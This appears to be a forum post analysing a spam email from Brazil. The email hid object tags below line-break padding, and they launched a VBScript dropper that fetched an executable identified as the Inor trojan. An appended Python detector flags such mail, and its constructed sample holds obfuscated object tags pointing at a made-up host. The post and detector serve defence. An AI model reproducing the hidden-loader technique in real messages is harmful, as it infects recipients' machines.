Not a virus, spam combined with social engineering combined with a malware installation attempt.

We've received spam from this dynamic IP in Brazil:

200-153-121-39.customer.tdatabrasil.net.br [200.153.121.39]

which was HTML formatted with the message:

"Hey...haven't talked to you guys in a while just wanted to see how things are going ttyl"

and then many line breaks so as to scroll off the message window, then:

<object data="" width=14>
<object data="" width=14>
<object data="" width=14>
<object data="" width=14>
<object data="" width=14>

which decode to this address in China (heavily listed in ip4r, e.g. http://www.spamhaus.org/SBL/sbl.lasso?query=SBL10762 )

Which in turn are fired off, perhaps invisibly to the user, and execute an encrypted VBScript whose purpose is to create a "dropper" file called c:\x.exe and launch it. This in turn downloads:

it then launches it to do whatever. This last executable is UPX packed, and it in turn contains a UPX packed section, so mstasks.exe is likely a dropper as well. I wasn't interested in running it to find out.

Various bits of these files, including the last executable, are detected by McAfee as the Inor trojan.

Inor has been around since 2002 and is definitely linked to further spam distribution via a backdoor.
Andrew
8)
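A small mail-body detector for the pattern Andrew describes (a short friendly line, a long run of line breaks, then several hidden `<object data=...>` tags whose targets are obfuscated), added here as an example and not code from the original post. The sample message and the 203.0.113.5 address are constructed, and the percent-encoding and decimal/hex-IP tricks it undoes are assumptions about how the tags were obfuscated, since the post does not show the original data attributes.

```python
import ipaddress
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlsplit, urlunsplit

PADDING_THRESHOLD = 20  # consecutive <br>s: enough to push what follows off-screen

class ObjectScanner(HTMLParser):
    """Collect <object>/<embed>/<iframe> load targets and the longest <br> run."""
    def __init__(self):
        super().__init__()
        self.loaders, self.br_run, self.max_br_run = [], 0, 0

    def handle_starttag(self, tag, attrs):
        if tag == "br":
            self.br_run += 1
            self.max_br_run = max(self.max_br_run, self.br_run)
            return
        self.br_run = 0
        if tag in ("object", "embed", "iframe"):
            a = dict(attrs)
            src = a.get("data") or a.get("src")
            if src:
                self.loaders.append(src)

    def handle_data(self, data):
        if data.strip():  # visible text ends a padding run
            self.br_run = 0

def normalize(url):
    """Undo percent-encoding and decimal/hex IPv4 hosts such as http://3405803781/."""
    parts = urlsplit(unquote(url))
    host = parts.hostname or ""  # already lower-cased by urlsplit
    if re.fullmatch(r"0x[0-9a-f]+|\d+", host):
        host = str(ipaddress.IPv4Address(int(host, 16 if host.startswith("0x") else 10)))
    netloc = host + (f":{parts.port}" if parts.port else "")
    return urlunsplit((parts.scheme, netloc, parts.path, parts.query, parts.fragment))

def scan(html):
    """Return decoded loader URLs, the longest <br> run, and a verdict."""
    p = ObjectScanner()
    p.feed(html)
    loaders = [normalize(u) for u in p.loaders]
    return {"loaders": loaders, "max_br_run": p.max_br_run,
            "suspicious": bool(loaders) and p.max_br_run >= PADDING_THRESHOLD}

# Constructed sample shaped like the mail above; 203.0.113.5 (3405803781) is made up.
SAMPLE = ("<html><body>Hey...haven't talked to you guys in a while ttyl" + "<br>" * 60
          + '<object data="http://%33%34%30%35%38%30%33%37%38%31/x.vbs" width=14></object>' * 5
          + "</body></html>")
```

Run `scan(SAMPLE)` to see the five decoded targets and the 60-break padding run flagged together; a message with loaders but no padding, or padding but no loaders, is not flagged.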
